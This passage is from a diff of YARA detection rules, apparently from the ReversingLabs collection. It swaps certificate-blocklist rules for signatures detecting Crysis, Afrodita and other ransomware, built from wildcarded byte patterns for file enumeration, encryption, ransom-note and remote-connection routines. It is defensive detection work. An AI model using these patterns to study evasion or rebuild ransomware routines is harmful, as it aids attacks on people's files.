+            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80
+            FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50
+            8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF
+        }
+		$encrypt_files_p2 = {
+            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 8B C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
+            45 ?? 50 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF
+            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B
+            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$main_routine = {
+            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 8D 55 ?? 66
+            B8 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B
+            0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 8D 55 ??
+            33 C0 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF
+            51
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRIND & TAMP ENTERPRISES PTY LTD" and ( pe.signatures [ i ] . serial == "00:e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" or pe.signatures [ i ] . serial == "e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" ) and 1570838400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Cfac705C7E6845904F99995324F7562C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Crysis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Crysis ransomware."
 		author = "ReversingLabs"
-		id = "42aa3105-a077-5962-8d5d-50429254582b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "bba2bbf5-ff77-5ec4-ae7f-afae1b564fb7"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5270-L5288"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "68bcfe60c2e7154f427c20d0471ede99e55c8200149a4438d5a2a75982fcd419"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Crysis.yara#L1-L108"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3c9250206f94ac65c1fc24e83cf8cdd76d10066086ef1f34ec14791d237c0263"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Crysis"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ??
+            6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9
+            ?? ?? ?? ?? 66 89 4D ?? 6A ?? FF 15 ?? ?? ?? ?? 66 89 45 ?? 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 83 3C 82 ??
+            74 ?? 8B 4D ?? 0F BF 51 ?? 52 8B 45 ?? 8B 48 ?? 8B 55 ?? 8B 04 91 50 8D 4D ?? 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
+            ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ??
+            6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$enumerate_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 33 DB 81 7D ?? ?? ?? ?? ?? 56 57 89 5C 24 ??
+            0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ??
+            57 8B F0 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 6A ??
+            68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 56
+            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8D 4C 24 ?? 51 68
+            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? F6 44 24
+            ?? ?? 74 ?? 66 83 7C 24 ?? ?? 74 ?? 53 8D 54 24 ?? 52 8B D6 8B CF FF 55 ?? 85 C0 7E
+            ?? 8B 45 ?? 8B 4D ?? 40 50 53 51 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 53 8D 54 24 ?? 52
+            8B D6 8B CF FF 55 ?? 85 C0 7E ?? FF 44 24 ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ??
+            ?? ?? ?? 85 C0 7F ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 56 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
+        }
+		$enumerate_resources = {
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83
+            ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B
+            45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B
+            4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
+            4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83
+            C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 83 7C
+            01 ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B
+            54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45
+            ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83
+            E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5E 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 8B D8 33 C0 56 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 8B
+            45 ?? 6A ?? 50 8D 4D ?? 51 8D 77 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
+            D3 83 E2 ?? 2B DA 83 EB ?? 83 C4 ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 50 FF D3 89 45 ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 51 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 81 C2
+            ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? A8 ?? 74 ?? 83 E0 ?? 50 8B
+            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51
+            FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 33 C0
+            33 C9 51 50 53 89 45 ?? 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ??
+            ?? 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 53 FF 15 ??
+            ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 75 ?? 3B 4D ?? 73 ?? 8B D1 83 E2 ?? B8 ?? ??
+            ?? ?? 2B C2 89 45 ?? 57 03 C1 8D 8D ?? ?? ?? ?? 57 51 E8 ?? ?? ?? ?? 8B 4D ?? 03 4D
+            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 51 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
+            45 ?? 03 45 ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57
+            50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B 45
+            ?? 83 C4 ?? C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 51 50 56
+            C7 47 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 03 F0 01 45 ?? 8B 55 ?? 6A ??
+            52 56 E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
+            83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 68
+            ?? ?? ?? ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 83 EE ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 2B F7 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            39 75 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 7D
+            ?? ?? 7E ?? 8B 75 ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 56 FF 15 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 8B 4D ?? 50 51
+            FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HMWOCFPSDLAFMFZIVD" and ( pe.signatures [ i ] . serial == "cf:ac:70:5c:7e:68:45:90:4f:99:99:53:24:f7:56:2c" or pe.signatures [ i ] . serial == "30:53:8f:a3:81:97:ba:6f:b0:66:66:ac:db:08:a9:d4" ) and 1601918720 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enumerate_resources and $enumerate_files and $encrypt_files and $remote_connection_1 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_A7989F8Be0C82D35A19E7B3Dd4Be30E5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Afrodita : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Afrodita ransomware."
 		author = "ReversingLabs"
-		id = "21d54d40-442e-50f5-a561-41b3d6239bac"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "513963fd-5f3d-5d31-a65a-37f6f5c72260"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5290-L5308"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a50129908a471e6692bcf663abd5ef52861d4a46fdf528f39efe816ee6150edf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Afrodita.yara#L1-L119"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ce7cc445d4c1f59c25b9505fc1f7f9dd0d286ab80510e2977b50ff15433aea60"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Afrodita"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$exclude_directories_and_drop_ransom_note = {
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 8D ?? ??
+            ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 75 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B
+            55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? EB ?? B8
+        }
+		$drop_ransom_note_no_dir_exclusion = {
+            8D 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 88 85 ?? ?? ?? ?? 33 C9 88 8D ?? ??
+            ?? ?? 33 D2 88 95 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 50 0F B6 8D ?? ?? ?? ?? 51 0F B6
+            95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ??
+            50 8B 4B ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B
+            5D ?? B8 ?? ?? ?? ?? C3 C7 45
+        }
+		$find_files_p1 = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
+            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
+            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
+            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
+            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
+            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
+        }
+		$find_files_p2 = {
+            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
+            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
